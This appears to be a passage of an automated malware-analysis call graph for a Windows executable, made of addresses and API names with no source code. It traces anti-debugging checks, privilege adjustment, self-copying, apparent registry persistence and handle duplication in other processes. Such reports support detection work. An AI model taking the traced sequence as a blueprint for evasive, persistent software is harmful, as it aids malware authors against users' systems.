68 API calls 19092->19094 19096 7ff60bfaa058 _Yarn 19094->19096 19095 7ff60bfaa071 FreeEnvironmentStringsW 19095->19091 19096->19095 19098 7ff60bfa9b20 wparse_cmdline 19097->19098 19099 7ff60bfa379e 19098->19099 19100 7ff60bfa9b7b 19098->19100 19099->19061 19213 7ff60bfa3e20 19099->19213 19101 7ff60bfa4254 _malloc_crt 68 API calls 19100->19101 19102 7ff60bfa9b80 wparse_cmdline 19101->19102 19102->19099 19104 7ff60bfa9d9b LangCountryEnumProcEx 19103->19104 19105 7ff60bfa37b1 19103->19105 19106 7ff60bfa9dbb 19104->19106 19105->19065 19105->19066 19107 7ff60bfa41d4 _calloc_crt 68 API calls 19106->19107 19115 7ff60bfa9dcb LangCountryEnumProcEx 19107->19115 19108 7ff60bfa9e33 19109 7ff60bfa240c free 68 API calls 19108->19109 19110 7ff60bfa9e42 19109->19110 19110->19105 19111 7ff60bfa41d4 _calloc_crt 68 API calls 19111->19115 19112 7ff60bfa9e73 19113 7ff60bfa240c free 68 API calls 19112->19113 19113->19110 19115->19105 19115->19108 19115->19111 19115->19112 19116 7ff60bfa9e8b 19115->19116 19326 7ff60bfaa34c 19115->19326 19335 7ff60bfa47c0 19116->19335 19121 7ff60bfa3e7e _IsNonwritableInCurrentImage 19119->19121 19361 7ff60bfaaf50 19121->19361 19122 7ff60bfa3e9b _initterm_e 19124 7ff60bfa3ebe _IsNonwritableInCurrentImage 19122->19124 19364 7ff60bfa1790 19122->19364 19124->19068 19381 7ff60bf9e000 19125->19381 19130 7ff60bf9fbd4 19615 7ff60bfa060c GetCurrentProcess OpenProcessToken 19130->19615 19131 7ff60bf9fbcc ExitProcess 19135 7ff60bf9fbef 19136 7ff60bf9fce1 19135->19136 19137 7ff60bf9fc08 19135->19137 19642 7ff60bfa0798 19136->19642 19630 7ff60bfa0740 CreateMutexExA 19137->19630 19142 7ff60bf9fc23 CreateThread CreateThread CreateThread CreateThread 19634 7ff60bfa01a8 19142->19634 19143 7ff60bf9fc1b ExitProcess 19147 7ff60bf9fcc0 19150 7ff60bf9fcd4 ExitProcess 19147->19150 19151 7ff60bf9fcc7 Sleep 19147->19151 19148 7ff60bf9fda2 19652 7ff60bf834f0 19148->19652 19149 7ff60bf9fcfa 19153 7ff60bfa0740 3 API calls 19149->19153 19151->19147 19154 7ff60bf9fd06 19153->19154 19156 7ff60bf9fd15 CreateThread CreateThread CreateThread 19154->19156 19157 7ff60bf9fd0d ExitProcess 19154->19157 19158 7ff60bf9fd84 19156->19158 19159 7ff60bf9fd98 ExitProcess 19158->19159 19160 7ff60bf9fd8b Sleep 19158->19160 19160->19158 20401 7ff60bfa9ea8 19161->20401 19164 7ff60bfa9ea8 _set_error_mode 68 API calls 19166 7ff60bfa385d 19164->19166 19165 7ff60bfa38b4 _NMSG_WRITE 68 API calls 19167 7ff60bfa3874 19165->19167 19166->19165 19168 7ff60bfa387e 19166->19168 19169 7ff60bfa38b4 _NMSG_WRITE 68 API calls 19167->19169 19168->19043 19169->19168 19171 7ff60bfa38e8 _NMSG_WRITE 19170->19171 19173 7ff60bfa9ea8 _set_error_mode 65 API calls 19171->19173 19209 7ff60bfa3a22 19171->19209 19175 7ff60bfa38fe 19173->19175 19176 7ff60bfa3a24 GetStdHandle 19175->19176 19177 7ff60bfa9ea8 _set_error_mode 65 API calls 19175->19177 19180 7ff60bfa3a3c _cftoe2_l 19176->19180 19176->19209 19178 7ff60bfa390f 19177->19178 19178->19176 19179 7ff60bfa3920 19178->19179 19182 7ff60bfaa34c __lc_lctowcs 65 API calls 19179->19182 19179->19209 19181 7ff60bfa3a74 WriteFile 19180->19181 19181->19209 19183 7ff60bfa394b 19182->19183 19184 7ff60bfa3955 GetModuleFileNameW 19183->19184 19203 7ff60bfa3b0f 19183->19203 19186 7ff60bfa397a 19184->19186 19194 7ff60bfa3993 LangCountryEnumProcEx 19184->19194 19185 7ff60bfa47c0 _invoke_watson 15 API calls 19187 7ff60bfa3b22 19185->19187 19188 7ff60bfaa34c __lc_lctowcs 65 API calls 19186->19188 19189 7ff60bfa398b 19188->19189 19190 7ff60bfa3abc 19189->19190 19189->19194 19193 7ff60bfa47c0 _invoke_watson 15 API calls 19190->19193 19191 7ff60bfa39dd 20416 7ff60bfaa2c4 19191->20416 19196 7ff60bfa3ad0 19193->19196 19194->19191 20407 7ff60bfaa3d4 19194->20407 19201 7ff60bfa47c0 _invoke_watson 15 API calls 19196->19201 19198 7ff60bfa3afa 19202 7ff60bfa47c0 _invoke_watson 15 API calls 19198->19202 19200 7ff60bfaa2c4 _NMSG_WRITE 65 API calls 19204 7ff60bfa3a05 19200->19204 19205 7ff60bfa3ae5 19201->19205 19202->19203 19203->19185 19204->19205 19206 7ff60bfa3a0d 19204->19206 19208 7ff60bfa47c0 _invoke_watson 15 API calls 19205->19208 20425 7ff60bfaa4a0 EncodePointer 19206->20425 19208->19198 20450 7ff60bfa6bb0 19209->20450 19210 7ff60bfa3e08 20472 7ff60bfa3dc4 GetModuleHandleExW 19210->20472 19214 7ff60bfa3840 _FF_MSGBANNER 68 API calls 19213->19214 19215 7ff60bfa3e2d 19214->19215 19216 7ff60bfa38b4 _NMSG_WRITE 68 API calls 19215->19216 19217 7ff60bfa3e34 19216->19217 20475 7ff60bfa3ff4 19217->20475 19221 7ff60bfa3f3d _init_pointers 19220->19221 19222 7ff60bfa8104 EncodePointer 19221->19222 19222->19077 19224 7ff60bfaae1b 19223->19224 19225 7ff60bfaae21 InitializeCriticalSectionAndSpinCount 19224->19225 19226 7ff60bfaae4c 19224->19226 19225->19224 19226->19079 19228 7ff60bfa41f9 19227->19228 19230 7ff60bfa4236 19228->19230 19231 7ff60bfa4217 Sleep 19228->19231 19248 7ff60bfaaf94 19228->19248 19230->19080 19230->19086 19231->19228 19231->19230 19278 7ff60bfaac78 19232->19278 19245 7ff60bfa591f 19241->19245 19242 7ff60bfaacec DeleteCriticalSection 19244 7ff60bfa240c free 68 API calls 19242->19244 19243 7ff60bfaad0a 19246 7ff60bfaad1f DeleteCriticalSection 19243->19246 19247 7ff60bfa374f 19243->19247 19244->19245 19245->19242 19245->19243 19246->19243 19247->19049 19247->19050 19247->19054 19249 7ff60bfaafa9 19248->19249 19253 7ff60bfaafc6 19248->19253 19250 7ff60bfaafb7 19249->19250 19249->19253 19256 7ff60bfa59a4 19250->19256 19252 7ff60bfaafde HeapAlloc 19252->19253 19254 7ff60bfaafbc 19252->19254 19253->19252 19253->19254 19259 7ff60bfa3d88 DecodePointer 19253->19259 19254->19228 19261 7ff60bfa5750 GetLastError 19256->19261 19258 7ff60bfa59ad 19258->19254 19260 7ff60bfa3da3 19259->19260 19260->19253 19262 7ff60bfa576d 19261->19262 19263 7ff60bfa57bc SetLastError 19262->19263 19264 7ff60bfa41d4 _calloc_crt 65 API calls 19262->19264 19263->19258 19265 7ff60bfa5782 19264->19265 19265->19263 19266 7ff60bfa579f 19265->19266 19267 7ff60bfa57b5 19265->19267 19268 7ff60bfa57d4 _initptd 65 API calls 19266->19268 19272 7ff60bfa240c 19267->19272 19270 7ff60bfa57a6 GetCurrentThreadId 19268->19270 19270->19263 19271 7ff60bfa57ba 19271->19263 19273 7ff60bfa2411 HeapFree 19272->19273 19274 7ff60bfa2441 realloc 19272->19274 19273->19274 19275 7ff60bfa242c 19273->19275 19274->19271 19276 7ff60bfa59a4 _errno 66 API calls 19275->19276 19277 7ff60bfa2431 GetLastError 19276->19277 19277->19274 19279 7ff60bfaac96 19278->19279 19280 7ff60bfaaca7 EnterCriticalSection 19278->19280 19284 7ff60bfaad44 19279->19284 19283 7ff60bfa3e20 _lock 67 API calls 19283->19280 19285 7ff60bfaad61 19284->19285 19286 7ff60bfaad7a 19284->19286 19288 7ff60bfa3840 _FF_MSGBANNER 66 API calls 19285->19288 19287 7ff60bfaac9b 19286->19287 19305 7ff60bfa4254 19286->19305 19287->19280 19287->19283 19290 7ff60bfaad66 19288->19290 19291 7ff60bfa38b4 _NMSG_WRITE 66 API calls 19290->19291 19293 7ff60bfaad70 19291->19293 19296 7ff60bfa3e08 malloc 3 API calls 19293->19296 19294 7ff60bfaada4 19297 7ff60bfa59a4 _errno 66 API calls 19294->19297 19295 7ff60bfaadb3 19298 7ff60bfaac78 _lock 66 API calls 19295->19298 19296->19286 19297->19287 19299 7ff60bfaadbd 19298->19299 19300 7ff60bfaadc8 InitializeCriticalSectionAndSpinCount 19299->19300 19301 7ff60bfaadd9 19299->19301 19303 7ff60bfaaddf LeaveCriticalSection 19300->19303 19302 7ff60bfa240c free 66 API calls 19301->19302 19304 7ff60bfaadde 19302->19304 19303->19287 19304->19303 19306 7ff60bfa427c 19305->19306 19308 7ff60bfa42b1 19306->19308 19309 7ff60bfa4290 Sleep 19306->19309 19310 7ff60bfa244c 19306->19310 19308->19294 19308->19295 19309->19306 19309->19308 19311 7ff60bfa24e0 19310->19311 19322 7ff60bfa2464 19310->19322 19312 7ff60bfa3d88 _callnewh DecodePointer 19311->19312 19313 7ff60bfa24e5 19312->19313 19316 7ff60bfa59a4 _errno 67 API calls 19313->19316 19314 7ff60bfa249c HeapAlloc 19317 7ff60bfa24d5 19314->19317 19314->19322 19315 7ff60bfa3840 _FF_MSGBANNER 67 API calls 19315->19322 19316->19317 19317->19306 19318 7ff60bfa24c5 19321 7ff60bfa59a4 _errno 67 API calls 19318->19321 19319 7ff60bfa38b4 _NMSG_WRITE 67 API calls 19319->19322 19320 7ff60bfa3d88 _callnewh DecodePointer 19320->19322 19323 7ff60bfa24ca 19321->19323 19322->19314 19322->19315 19322->19318 19322->19319 19322->19320 19322->19323 19324 7ff60bfa3e08 malloc 3 API calls 19322->19324 19325 7ff60bfa59a4 _errno 67 API calls 19323->19325 19324->19322 19325->19317 19327 7ff60bfaa364 19326->19327 19328 7ff60bfaa35a 19326->19328 19329 7ff60bfa59a4 _errno 68 API calls 19327->19329 19328->19327 19332 7ff60bfaa381 19328->19332 19334 7ff60bfaa36d 19329->19334 19331 7ff60bfaa379 19331->19115 19332->19331 19333 7ff60bfa59a4 _errno 68 API calls 19332->19333 19333->19334 19340 7ff60bfa47a0 19334->19340 19336 7ff60bfa47ce 19335->19336 19349 7ff60bfa463c 19336->19349 19343 7ff60bfa4738 DecodePointer 19340->19343 19344 7ff60bfa4776 19343->19344 19345 7ff60bfa47c0 _invoke_watson 15 API calls 19344->19345 19346 7ff60bfa479c 19345->19346 19347 7ff60bfa4738 _invalid_parameter_noinfo 15 API calls 19346->19347 19348 7ff60bfa47b9 19347->19348 19348->19331 19350 7ff60bfa4677 _call_reportfault 19349->19350 19357 7ff60bfaa094 RtlCaptureContext RtlLookupFunctionEntry 19350->19357 19358 7ff60bfaa0c4 RtlVirtualUnwind 19357->19358 19359 7ff60bfa46af IsDebuggerPresent 19357->19359 19358->19359 19360 7ff60bfaa24c SetUnhandledExceptionFilter UnhandledExceptionFilter 19359->19360 19362 7ff60bfaaf63 EncodePointer 19361->19362 19362->19362 19363 7ff60bfaaf7e 19362->19363 19363->19122 19367 7ff60bfa1684 19364->19367 19380 7ff60bfa3fdc 19367->19380 19684 7ff60bf9df78 LoadLibraryA GetProcAddress 19381->19684 19383 7ff60bf9e073 19685 7ff60bf9df78 LoadLibraryA GetProcAddress 19383->19685 19385 7ff60bf9e08d 19686 7ff60bf9dfbc LoadLibraryA GetProcAddress 19385->19686 19387 7ff60bf9e0a7 19687 7ff60bf9dfbc LoadLibraryA GetProcAddress 19387->19687 19389 7ff60bf9e0c1 19688 7ff60bf9dfbc LoadLibraryA GetProcAddress 19389->19688 19391 7ff60bf9e0db 19689 7ff60bf9dfbc LoadLibraryA GetProcAddress 19391->19689 19393 7ff60bf9e0f5 19690 7ff60bf9dfbc LoadLibraryA GetProcAddress 19393->19690 19395 7ff60bf9e10f 19691 7ff60bf9dfbc LoadLibraryA GetProcAddress 19395->19691 19397 7ff60bf9e129 19692 7ff60bf9dfbc LoadLibraryA GetProcAddress 19397->19692 19399 7ff60bf9e143 19693 7ff60bf9dfbc LoadLibraryA GetProcAddress 19399->19693 19401 7ff60bf9e15d 19694 7ff60bf9dfbc LoadLibraryA GetProcAddress 19401->19694 19403 7ff60bf9e177 19695 7ff60bf9df78 LoadLibraryA GetProcAddress 19403->19695 19405 7ff60bf9e191 19696 7ff60bf9df78 LoadLibraryA GetProcAddress 19405->19696 19407 7ff60bf9e1ab 19697 7ff60bf9df78 LoadLibraryA GetProcAddress 19407->19697 19409 7ff60bf9e1c5 19698 7ff60bf9df78 LoadLibraryA GetProcAddress 19409->19698 19411 7ff60bf9e1df 19699 7ff60bf9dfbc LoadLibraryA GetProcAddress 19411->19699 19413 7ff60bf9e1f9 19700 7ff60bf9dfbc LoadLibraryA GetProcAddress 19413->19700 19415 7ff60bf9e213 19701 7ff60bf9dfbc LoadLibraryA GetProcAddress 19415->19701 19417 7ff60bf9e22d 19702 7ff60bf9dfbc LoadLibraryA GetProcAddress 19417->19702 19419 7ff60bf9e247 19703 7ff60bf9dfbc LoadLibraryA GetProcAddress 19419->19703 19421 7ff60bf9e261 19704 7ff60bf9dfbc LoadLibraryA GetProcAddress 19421->19704 19423 7ff60bf9e27b 19705 7ff60bf9dfbc LoadLibraryA GetProcAddress 19423->19705 19425 7ff60bf9e295 19706 7ff60bf9dfbc LoadLibraryA GetProcAddress 19425->19706 19427 7ff60bf9e2af 19707 7ff60bf9dfbc LoadLibraryA GetProcAddress 19427->19707 19429 7ff60bf9e2c9 19708 7ff60bf9dfbc LoadLibraryA GetProcAddress 19429->19708 19431 7ff60bf9e2e3 19709 7ff60bf9dfbc LoadLibraryA GetProcAddress 19431->19709 19433 7ff60bf9e2fd 19710 7ff60bf9dfbc LoadLibraryA GetProcAddress 19433->19710 19435 7ff60bf9e317 19711 7ff60bf9dfbc LoadLibraryA GetProcAddress 19435->19711 19437 7ff60bf9e331 19712 7ff60bf9dfbc LoadLibraryA GetProcAddress 19437->19712 19439 7ff60bf9e34b 19713 7ff60bf9dfbc LoadLibraryA GetProcAddress 19439->19713 19441 7ff60bf9e365 19714 7ff60bf9dfbc LoadLibraryA GetProcAddress 19441->19714 19443 7ff60bf9e37f 19715 7ff60bf9dfbc LoadLibraryA GetProcAddress 19443->19715 19445 7ff60bf9e399 19716 7ff60bf9dfbc LoadLibraryA GetProcAddress 19445->19716 19447 7ff60bf9e3b3 19717 7ff60bf9dfbc LoadLibraryA GetProcAddress 19447->19717 19449 7ff60bf9e3cd 19718 7ff60bf9dfbc LoadLibraryA GetProcAddress 19449->19718 19451 7ff60bf9e3e7 19719 7ff60bf9dfbc LoadLibraryA GetProcAddress 19451->19719 19453 7ff60bf9e401 19720 7ff60bf9dfbc LoadLibraryA GetProcAddress 19453->19720 19455 7ff60bf9e41b 19721 7ff60bf9dfbc LoadLibraryA GetProcAddress 19455->19721 19457 7ff60bf9e435 19722 7ff60bf9dfbc LoadLibraryA GetProcAddress 19457->19722 19459 7ff60bf9e44f 19723 7ff60bf9dfbc LoadLibraryA GetProcAddress 19459->19723 19461 7ff60bf9e469 19724 7ff60bf9dfbc LoadLibraryA GetProcAddress 19461->19724 19463 7ff60bf9e483 19725 7ff60bf9dfbc LoadLibraryA GetProcAddress 19463->19725 19465 7ff60bf9e49d 19726 7ff60bf9dfbc LoadLibraryA GetProcAddress 19465->19726 19467 7ff60bf9e4b7 19727 7ff60bf9dfbc LoadLibraryA GetProcAddress 19467->19727 19469 7ff60bf9e4d1 19728 7ff60bf9dfbc LoadLibraryA GetProcAddress 19469->19728 19471 7ff60bf9e4eb 19729 7ff60bf9dfbc LoadLibraryA GetProcAddress 19471->19729 19473 7ff60bf9e505 19730 7ff60bf9dfbc LoadLibraryA GetProcAddress 19473->19730 19475 7ff60bf9e51f 19731 7ff60bf9dfbc LoadLibraryA GetProcAddress 19475->19731 19477 7ff60bf9e539 19732 7ff60bf9dfbc LoadLibraryA GetProcAddress 19477->19732 19479 7ff60bf9e553 19733 7ff60bf9dfbc LoadLibraryA GetProcAddress 19479->19733 19481 7ff60bf9e56d 19734 7ff60bf9dfbc LoadLibraryA GetProcAddress 19481->19734 19483 7ff60bf9e587 19735 7ff60bf9dfbc LoadLibraryA GetProcAddress 19483->19735 19485 7ff60bf9e5a1 19736 7ff60bf9dfbc LoadLibraryA GetProcAddress 19485->19736 19487 7ff60bf9e5bb 19737 7ff60bf9dfbc LoadLibraryA GetProcAddress 19487->19737 19489 7ff60bf9e5d5 19738 7ff60bf9dfbc LoadLibraryA GetProcAddress 19489->19738 19491 7ff60bf9e5ef 19739 7ff60bf9dfbc LoadLibraryA GetProcAddress 19491->19739 19493 7ff60bf9e609 19740 7ff60bf9dfbc LoadLibraryA GetProcAddress 19493->19740 19495 7ff60bf9e623 19741 7ff60bf9dfbc LoadLibraryA GetProcAddress 19495->19741 19497 7ff60bf9e63d 19742 7ff60bf9dfbc LoadLibraryA GetProcAddress 19497->19742 19499 7ff60bf9e657 19743 7ff60bf9dfbc LoadLibraryA GetProcAddress 19499->19743 19501 7ff60bf9e671 19744 7ff60bf9dfbc LoadLibraryA GetProcAddress 19501->19744 19503 7ff60bf9e68b 19745 7ff60bf9dfbc LoadLibraryA GetProcAddress 19503->19745 19505 7ff60bf9e6a5 19746 7ff60bf9dfbc LoadLibraryA GetProcAddress 19505->19746 19507 7ff60bf9e6bf 19747 7ff60bf9dfbc LoadLibraryA GetProcAddress 19507->19747 19509 7ff60bf9e6d9 19748 7ff60bf9dfbc LoadLibraryA GetProcAddress 19509->19748 19511 7ff60bf9e6f3 19749 7ff60bf9dfbc LoadLibraryA GetProcAddress 19511->19749 19513 7ff60bf9e70d 19750 7ff60bf9dfbc LoadLibraryA GetProcAddress 19513->19750 19515 7ff60bf9e727 19751 7ff60bf9dfbc LoadLibraryA GetProcAddress 19515->19751 19517 7ff60bf9e741 19752 7ff60bf9dfbc LoadLibraryA GetProcAddress 19517->19752 19519 7ff60bf9e75b 19753 7ff60bf9dfbc LoadLibraryA GetProcAddress 19519->19753 19521 7ff60bf9e775 19754 7ff60bf9dfbc LoadLibraryA GetProcAddress 19521->19754 19523 7ff60bf9e78f 19755 7ff60bf9dfbc LoadLibraryA GetProcAddress 19523->19755 19525 7ff60bf9e7a9 19756 7ff60bf9dfbc LoadLibraryA GetProcAddress 19525->19756 19527 7ff60bf9e7c3 19757 7ff60bf9dfbc LoadLibraryA GetProcAddress 19527->19757 19529 7ff60bf9e7dd 19758 7ff60bf9dfbc LoadLibraryA GetProcAddress 19529->19758 19531 7ff60bf9e7f7 19759 7ff60bf9dfbc LoadLibraryA GetProcAddress 19531->19759 19533 7ff60bf9e811 19760 7ff60bf9dfbc LoadLibraryA GetProcAddress 19533->19760 19535 7ff60bf9e82b 19761 7ff60bf9dfbc LoadLibraryA GetProcAddress 19535->19761 19537 7ff60bf9e845 19762 7ff60bf9dfbc LoadLibraryA GetProcAddress 19537->19762 19539 7ff60bf9e85f 19763 7ff60bf9dfbc LoadLibraryA GetProcAddress 19539->19763 19541 7ff60bf9e879 19764 7ff60bf9dfbc LoadLibraryA GetProcAddress 19541->19764 19543 7ff60bf9e893 19765 7ff60bf9dfbc LoadLibraryA GetProcAddress 19543->19765 19545 7ff60bf9e8ad 19766 7ff60bf9dfbc LoadLibraryA GetProcAddress 19545->19766 19547 7ff60bf9e8c7 19767 7ff60bf9dfbc LoadLibraryA GetProcAddress 19547->19767 19549 7ff60bf9e8e1 19768 7ff60bf9dfbc LoadLibraryA GetProcAddress 19549->19768 19551 7ff60bf9e8fb 19769 7ff60bf9dfbc LoadLibraryA GetProcAddress 19551->19769 19553 7ff60bf9e915 19770 7ff60bf9dfbc LoadLibraryA GetProcAddress 19553->19770 19555 7ff60bf9e92f 19771 7ff60bf9dfbc LoadLibraryA GetProcAddress 19555->19771 19557 7ff60bf9e949 19772 7ff60bf9dfbc LoadLibraryA GetProcAddress 19557->19772 19559 7ff60bf9e963 19773 7ff60bf9dfbc LoadLibraryA GetProcAddress 19559->19773 19561 7ff60bf9e97d 19774 7ff60bf9dfbc LoadLibraryA GetProcAddress 19561->19774 19563 7ff60bf9e997 19775 7ff60bf9dfbc LoadLibraryA GetProcAddress 19563->19775 19565 7ff60bf9e9b1 19776 7ff60bf9dfbc LoadLibraryA GetProcAddress 19565->19776 19567 7ff60bf9e9cb 19777 7ff60bf9dfbc LoadLibraryA GetProcAddress 19567->19777 19569 7ff60bf9e9e5 19778 7ff60bf9dfbc LoadLibraryA GetProcAddress 19569->19778 19571 7ff60bf9e9ff 19779 7ff60bf9dfbc LoadLibraryA GetProcAddress 19571->19779 19573 7ff60bf9ea19 19780 7ff60bf9dfbc LoadLibraryA GetProcAddress 19573->19780 19575 7ff60bf9ea33 19781 7ff60bf9dfbc LoadLibraryA GetProcAddress 19575->19781 19577 7ff60bf9ea4d 19782 7ff60bf9dfbc LoadLibraryA GetProcAddress 19577->19782 19579 7ff60bf9ea67 19783 7ff60bf9df78 LoadLibraryA GetProcAddress 19579->19783 19581 7ff60bf9ea81 19784 7ff60bf9dfbc LoadLibraryA GetProcAddress 19581->19784 19583 7ff60bf9ea9b 19785 7ff60bf9dfbc LoadLibraryA GetProcAddress 19583->19785 19585 7ff60bf9eab5 19786 7ff60bf9dfbc LoadLibraryA GetProcAddress 19585->19786 19587 7ff60bf9eacf 19787 7ff60bf9dfbc LoadLibraryA GetProcAddress 19587->19787 19589 7ff60bf9eae9 19788 7ff60bf9dfbc LoadLibraryA GetProcAddress 19589->19788 19591 7ff60bf9eb03 19789 7ff60bf9dfbc LoadLibraryA GetProcAddress 19591->19789 19593 7ff60bf9eb1d 19790 7ff60bf9dfbc LoadLibraryA GetProcAddress 19593->19790 19595 7ff60bf9eb37 19791 7ff60bf9df78 LoadLibraryA GetProcAddress 19595->19791 19597 7ff60bf9eb51 19792 7ff60bf9df78 LoadLibraryA GetProcAddress 19597->19792 19599 7ff60bf9eb6b 19793 7ff60bf9dfbc LoadLibraryA GetProcAddress 19599->19793 19601 7ff60bf9eb85 19794 7ff60bf9dfbc LoadLibraryA GetProcAddress 19601->19794 19603 7ff60bf9eb9f 19795 7ff60bf9dfbc LoadLibraryA GetProcAddress 19603->19795 19605 7ff60bf9ebb9 19796 7ff60bf9dfbc LoadLibraryA GetProcAddress 19605->19796 19607 7ff60bf9ebd3 19797 7ff60bf9dfbc LoadLibraryA GetProcAddress 19607->19797 19609 7ff60bf9ebed 19798 7ff60bf9dfbc LoadLibraryA GetProcAddress 19609->19798 19611 7ff60bf9ec07 19612 7ff60bfa0150 IsDebuggerPresent 19611->19612 19613 7ff60bfa0162 GetCurrentProcess CheckRemoteDebuggerPresent 19612->19613 19614 7ff60bf9fbc5 19612->19614 19613->19614 19614->19130 19614->19131 19616 7ff60bfa0632 GetTokenInformation 19615->19616 19617 7ff60bf9fbd9 19615->19617 19799 7ff60bfa02b0 VirtualAlloc 19616->19799 19626 7ff60bfa03f4 GetModuleFileNameW 19617->19626 19619 7ff60bfa0663 GetTokenInformation 19620 7ff60bfa0690 CloseHandle 19619->19620 19621 7ff60bfa06aa AdjustTokenPrivileges CloseHandle 19619->19621 19622 7ff60bfa0280 VirtualFree 19620->19622 19800 7ff60bfa0280 19621->19800 19623 7ff60bfa06a5 19622->19623 19623->19617 19627 7ff60bfa041f PathFindFileNameW wcslen 19626->19627 19628 7ff60bfa04b8 wcsncpy 19626->19628 19629 7ff60bfa044d 19627->19629 19628->19629 19629->19135 19631 7ff60bfa076c GetLastError 19630->19631 19633 7ff60bf9fc14 19630->19633 19632 7ff60bfa0779 CloseHandle 19631->19632 19631->19633 19632->19633 19633->19142 19633->19143 19803 7ff60bfa0844 19634->19803 19636 7ff60bfa01b8 19806 7ff60bfa1010 CreateFileW 19636->19806 19639 7ff60bfa01f7 19640 7ff60bfa01fe Sleep 19639->19640 19641 7ff60bfa020b 19639->19641 19640->19639 19641->19147 19643 7ff60bfa1174 3 API calls 19642->19643 19644 7ff60bfa07c3 19643->19644 19645 7ff60bfa0844 11 API calls 19644->19645 19646 7ff60bfa07cd GetModuleFileNameW DeleteFileW CopyFileW 19645->19646 19647 7ff60bfa080f SetFileAttributesW 19646->19647 19648 7ff60bf9fce6 19646->19648 19823 7ff60bfa0f48 RegOpenKeyExW 19647->19823 19650 7ff60bfa0218 GetVersionExW 19648->19650 19651 7ff60bf9fcef 19650->19651 19651->19148 19651->19149 19827 7ff60bf82314 LoadLibraryA 19652->19827 19657 7ff60bf8352f GetModuleFileNameW 19841 7ff60bf822bc 19657->19841 19660 7ff60bf835ba CreateFileW 19662 7ff60bf8366b 19660->19662 19661 7ff60bf835f6 19845 7ff60bf83aa8 19661->19845 19883 7ff60bf82058 CreateFileMappingW 19662->19883 19664 7ff60bf83610 19850 7ff60bf83cd4 19664->19850 19669 7ff60bf836a9 CloseHandle 19890 7ff60bf82d60 GetTempPathW GetTempFileNameW 19669->19890 19670 7ff60bf836e7 19673 7ff60bf82f38 4 API calls 19670->19673 19676 7ff60bf836f6 CloseHandle 19673->19676 19679 7ff60bf836e0 19676->19679 19899 7ff60bf82fdc 19679->19899 19683 7ff60bf83525 ExitProcess 19684->19383 19685->19385 19686->19387 19687->19389 19688->19391 19689->19393 19690->19395 19691->19397 19692->19399 19693->19401 19694->19403 19695->19405 19696->19407 19697->19409 19698->19411 19699->19413 19700->19415 19701->19417 19702->19419 19703->19421 19704->19423 19705->19425 19706->19427 19707->19429 19708->19431 19709->19433 19710->19435 19711->19437 19712->19439 19713->19441 19714->19443 19715->19445 19716->19447 19717->19449 19718->19451 19719->19453 19720->19455 19721->19457 19722->19459 19723->19461 19724->19463 19725->19465 19726->19467 19727->19469 19728->19471 19729->19473 19730->19475 19731->19477 19732->19479 19733->19481 19734->19483 19735->19485 19736->19487 19737->19489 19738->19491 19739->19493 19740->19495 19741->19497 19742->19499 19743->19501 19744->19503 19745->19505 19746->19507 19747->19509 19748->19511 19749->19513 19750->19515 19751->19517 19752->19519 19753->19521 19754->19523 19755->19525 19756->19527 19757->19529 19758->19531 19759->19533 19760->19535 19761->19537 19762->19539 19763->19541 19764->19543 19765->19545 19766->19547 19767->19549 19768->19551 19769->19553 19770->19555 19771->19557 19772->19559 19773->19561 19774->19563 19775->19565 19776->19567 19777->19569 19778->19571 19779->19573 19780->19575 19781->19577 19782->19579 19783->19581 19784->19583 19785->19585 19786->19587 19787->19589 19788->19591 19789->19593 19790->19595 19791->19597 19792->19599 19793->19601 19794->19603 19795->19605 19796->19607 19797->19609 19798->19611 19799->19619 19801 7ff60bfa0291 VirtualFree 19800->19801 19802 7ff60bfa02a4 19800->19802 19801->19802 19802->19617 19812 7ff60bfa1174 GetWindowsDirectoryW 19803->19812 19805 7ff60bfa0873 8 API calls 19805->19636 19807 7ff60bfa1087 GetLastError 19806->19807 19808 7ff60bfa1066 19806->19808 19810 7ff60bfa01cb CreateThread 19807->19810 19817 7ff60bfa1394 GetFileSize 19808->19817 19810->19639 19813 7ff60bfa11b5 19812->19813 19814 7ff60bfa11c8 GetVolumeInformationW 19812->19814 19813->19814 19815 7ff60bfa125c 19814->19815 19816 7ff60bfa12ae wsprintfW 19815->19816 19816->19805 19822 7ff60bfa02b0 VirtualAlloc 19817->19822 19819 7ff60bfa13c0 19820 7ff60bfa1075 CloseHandle 19819->19820 19821 7ff60bfa13d4 SetFilePointer ReadFile 19819->19821 19820->19810 19821->19820 19822->19819 19824 7ff60bfa0f88 19823->19824 19825 7ff60bfa0f8c RegSetValueExW RegCloseKey 19823->19825 19824->19648 19825->19824 19828 7ff60bf82337 9 API calls 19827->19828 19829 7ff60bf82332 19827->19829 19830 7ff60bf82472 FreeLibrary 19828->19830 19831 7ff60bf82422 19828->19831 19832 7ff60bf81478 LoadLibraryA 19829->19832 19830->19829 19831->19829 19831->19830 19833 7ff60bf8149d GetProcAddress 19832->19833 19839 7ff60bf81496 19832->19839 19834 7ff60bf814c3 GetProcAddress 19833->19834 19833->19839 19835 7ff60bf814f5 GetProcAddress 19834->19835 19834->19839 19836 7ff60bf81527 GetProcAddress 19835->19836 19835->19839 19837 7ff60bf81559 GetProcAddress 19836->19837 19836->19839 19838 7ff60bf81588 GetProcAddress 19837->19838 19837->19839 19838->19839 19840 7ff60bf815b7 GetProcAddress 19838->19840 19839->19657 19839->19683 19840->19839 19842 7ff60bf822d7 ExpandEnvironmentStringsW 19841->19842 19843 7ff60bf822f0 ExpandEnvironmentStringsW 19841->19843 19844 7ff60bf82307 19842->19844 19843->19844 19844->19660 19844->19661 19910 7ff60bf83c0c 19845->19910 19849 7ff60bf83adc 19849->19664 19851 7ff60bf8361d OpenProcess 19850->19851 19852 7ff60bf83ce8 19850->19852 19854 7ff60bf81b30 19851->19854 19934 7ff60bf83e14 19852->19934 19855 7ff60bf81b90 19854->19855 19856 7ff60bf81bb7 19855->19856 19857 7ff60bf81b94 CloseHandle 19855->19857 19949 7ff60bf833f8 19856->19949 19879 7ff60bf81e54 19857->19879 19861 7ff60bf81bc0 CloseHandle 19861->19879 19863 7ff60bf81e60 19864 7ff60bf81e67 CloseHandle 19863->19864 19863->19879 19864->19879 19865 7ff60bf81c26 GetCurrentProcess DuplicateHandle 19866 7ff60bf81be3 19865->19866 19867 7ff60bf81c78 CreateThread 19865->19867 19866->19863 19866->19865 19868 7ff60bf81ce1 WaitForSingleObject 19867->19868 19869 7ff60bf81cd1 CloseHandle 19867->19869 19870 7ff60bf81cf5 TerminateThread CloseHandle CloseHandle 19868->19870 19871 7ff60bf81d20 CloseHandle GetExitCodeThread 19868->19871 19869->19866 19870->19871 19872 7ff60bf81d52 CloseHandle 19871->19872 19873 7ff60bf81d42 CloseHandle 19871->19873 19874 7ff60bf81d6f strrchr 19872->19874 19873->19872 19958 